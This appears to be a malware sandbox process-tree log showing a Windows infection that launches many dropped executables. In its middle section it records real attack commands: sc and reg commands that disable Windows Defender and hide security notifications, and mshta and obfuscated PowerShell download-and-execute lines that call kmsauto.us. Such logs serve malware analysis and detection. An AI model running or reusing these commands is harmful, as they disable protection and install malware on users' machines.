C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13656 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14596 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13028 -s 1644⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12316 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
-
C:\Users\Admin\Documents\LaGOi5FqrajxvOhiyDFqs9Zw.exe"C:\Users\Admin\Documents\LaGOi5FqrajxvOhiyDFqs9Zw.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\iopttXZB.com"C:\Users\Admin\AppData\Local\Temp\iopttXZB.com"3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8C14.tmp\8C15.tmp\8C16.bat C:\Users\Admin\AppData\Local\Temp\iopttXZB.com"4⤵
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled5⤵
-
-
C:\Windows\system32\sc.exesc config SecurityHealthService start=disabled5⤵
-
-
C:\Windows\system32\sc.exesc config Sense start=disabled5⤵
-
-
C:\Windows\system32\sc.exesc config WdNisDrv start=disabled5⤵
-
-
C:\Windows\system32\sc.exesc config WdNisSvc start=disabled5⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI" | find /i "SecHealthUI"5⤵
-
C:\Windows\system32\find.exefind /i "SecHealthUI"6⤵
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI"6⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\Microsoft.SecHealthUI_1000.22000.1.0_neutral__8wekyb3d8bbwe" /f5⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\S-1-5-21-257790753-2419383948-818201544-1000\Microsoft.SecHealthUI_1000.22000.1.0_neutral__8wekyb3d8bbwe" /f5⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\PackageState\S-1-5-21-257790753-2419383948-818201544-1000\Microsoft.SecHealthUI_8wekyb3d8bbwe" /f5⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility5⤵
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility6⤵
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender;" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\FtjUdUdy.com"C:\Users\Admin\AppData\Local\Temp\FtjUdUdy.com"3⤵
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://kmsauto.us/ra/Encoding.txt4⤵
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ra/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X5⤵
- Blocklisted process makes network request
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd6⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1636 -s 16926⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\XCpA6wq6.com"C:\Users\Admin\AppData\Local\Temp\XCpA6wq6.com"3⤵
- Executes dropped EXE
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://kmsauto.us/Encoding.txt4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X5⤵
- Blocklisted process makes network request
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd6⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6148 -s 26806⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
-
-
C:\Users\Admin\Documents\NkxB2pYtHkSH45YtWxIgEnEI.exe"C:\Users\Admin\Documents\NkxB2pYtHkSH45YtWxIgEnEI.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\RZm4hyoREtWQ6FoyHVQskFuM.exe"C:\Users\Admin\Documents\RZm4hyoREtWQ6FoyHVQskFuM.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\RZm4hyoREtWQ6FoyHVQskFuM.exe"C:\Users\Admin\Documents\RZm4hyoREtWQ6FoyHVQskFuM.exe"3⤵
-
-
-
C:\Users\Admin\Documents\RTkOCBhKilxQpTnUe0g7bA4p.exe"C:\Users\Admin\Documents\RTkOCBhKilxQpTnUe0g7bA4p.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 3044⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KU6UUiwSos.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\KU6UUiwSos.exe"3⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 1524⤵
- Program crash
-
-
-
-
C:\Users\Admin\Documents\ZF2JIxFMOfpfwaF58aLf1Bpz.exe"C:\Users\Admin\Documents\ZF2JIxFMOfpfwaF58aLf1Bpz.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2536 -s 2363⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe"C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 1644⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
